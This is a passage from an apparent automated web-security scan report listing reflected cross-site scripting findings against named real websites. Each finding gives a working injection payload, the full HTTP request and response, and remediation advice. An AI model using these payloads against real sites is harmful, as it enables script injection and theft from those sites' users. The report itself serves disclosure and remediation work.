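console.log(jsonp(GOOD_CALLBACK, ERROR_PAYLOAD).body); // "<script>" appears as \u003cscript\u003e
console.log(jsonp(BAD_CALLBACK, ERROR_PAYLOAD));       // status 400, payload never echoed
```

Rejecting rather than sanitising the callback is deliberate: a JSONP client only ever sends an identifier, so any other character is an error, and returning a fixed message means the rejected value is never reflected anywhere.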

2.119. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [bullet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the bullet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10439\'%3balert(1)//79f264c7f46 was submitted in the bullet parameter. This input was echoed as 10439\\';alert(1)//79f264c7f46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash must be escaped as well as the quote, and before it: replace each backslash with two backslashes first, then prefix each quote with a backslash. A simpler rule that cannot be applied in the wrong order is to encode every character outside [A-Za-z0-9] as a \uXXXX JavaScript escape. Note that this response is a document.write(...) script served with Content-Type: text/html, so the same literal becomes HTML once written; the \uXXXX rule also keeps a </script> in the data from ending the script if it is ever inlined.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue10439\'%3balert(1)//79f264c7f46&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:48 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68549

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<div class="t-p t-tn &#xD;&#xA;                    t-bg5 &#xD;&#xA;                    t-bullet-blue10439\\';alert(1)//79f264c7f46">
...[SNIP]...

2.120. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59e5\'%3balert(1)//c310a5bf213 was submitted in the title parameter. This input was echoed as d59e5\\';alert(1)//c310a5bf213 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash must be escaped before the quote (each backslash replaced by two backslashes, then each quote prefixed with a backslash), or every character outside [A-Za-z0-9] encoded as a \uXXXX JavaScript escape.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisersd59e5\'%3balert(1)//c310a5bf213&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:01 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68609

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/" title="Click to view more Advertisersd59e5\\';alert(1)//c310a5bf213" target="">
...[SNIP]...

2.121. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [track parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the track request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6be1a\'%3balert(1)//b579f80b78c was submitted in the track parameter. This input was echoed as 6BE1A\\';ALERT(1)//B579F80B78C in the application's response: the application upper-cases the value before writing it into the ptype= query string of the anchor.

This proof-of-concept demonstrates that the string can be terminated, so injected JavaScript runs in the page. As echoed, however, alert(1) has become ALERT(1), which is a reference error rather than a dialog; a working payload for this parameter has to remain valid JavaScript after upper-casing.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash must be escaped before the quote (each backslash replaced by two backslashes, then each quote prefixed with a backslash), or every character outside [A-Za-z0-9] encoded as a \uXXXX JavaScript escape.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List6be1a\'%3balert(1)//b579f80b78c HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:28 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74519

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST6BE1A\\';ALERT(1)//B579F80B78C&amp;adid=11009420&amp;advid=1360889" class="t-rop-ad-anchor" target="" id="rop-ad/11009420-300x460">
...[SNIP]...

2.122. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [viewmore parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the viewmore request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dec08\'%3balert(1)//ffa7e553f8f was submitted in the viewmore parameter. This input was echoed as dec08\\';alert(1)//ffa7e553f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3Edec08\'%3balert(1)//ffa7e553f8f&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:14 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68549

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/" title="Click to view more Advertisers" target="">View more &gt;dec08\\';alert(1)//ffa7e553f8f</a>
...[SNIP]...

2.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 301af'-alert(1)-'55b63ce7126 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html301af'-alert(1)-'55b63ce7126&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:19 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:33:19 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:33:19 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:19 GMT; path=/
Set-Cookie: _curtime=1305207199; domain=pubmatic.com; expires=Thu, 12-May-2011 14:43:19 GMT; path=/
Set-Cookie: pubfreq_25277_19976_1033750466=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:13:19 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:19 GMT; path=/
Content-Length: 1558

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9933739605160317|cb=1305207199|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
height=90&kltstamp=1305207199&indirectAdId=0&adServerOptimizerId=2&ranreq=0.5169705713633448&campaignId=1873&creativeId=0&pctr=0.000000&pixelId=1039&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html301af'-alert(1)-'55b63ce7126">
...[SNIP]...

2.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb4f'-alert(1)-'c857c4e6058 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448eeb4f'-alert(1)-'c857c4e6058&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:20 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:33:20 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:33:20 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:20 GMT; path=/
Set-Cookie: pubfreq_25277_19976_1883964808=661-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:13:20 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:20 GMT; path=/
Content-Length: 1753

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAL1iAAAIT
...[SNIP]...
eId=25277&adId=19976&adServerId=661&kefact=1.299975&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kltstamp=1305207200&indirectAdId=24818&adServerOptimizerId=1&ranreq=0.5169705713633448eeb4f'-alert(1)-'c857c4e6058&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html">
...[SNIP]...

2.125. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c08f"><script>alert(1)</script>b6dbed5532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news8c08f"><script>alert(1)</script>b6dbed5532a/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:06 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 134351975
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news8c08f"><script>alert(1)</script>b6dbed5532a/2011/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.126. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f799"><script>alert(1)</script>b868d2523b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/20113f799"><script>alert(1)</script>b868d2523b/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:07 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 946343016
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/20113f799"><script>alert(1)</script>b868d2523b/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.127. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae9f"><script>alert(1)</script>80eb65e6163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/maycae9f"><script>alert(1)</script>80eb65e6163/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074518
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/maycae9f"><script>alert(1)</script>80eb65e6163/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.128. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47efa"><script>alert(1)</script>8b4c9f9ffa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/may/1247efa"><script>alert(1)</script>8b4c9f9ffa/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:11 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 1603506712
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/may/1247efa"><script>alert(1)</script>8b4c9f9ffa/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.129. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b694c"><script>alert(1)</script>1fa13f77dcf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/may/12/heder-here-in-this-spp-pppppb694c"><script>alert(1)</script>1fa13f77dcf/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:12 GMT
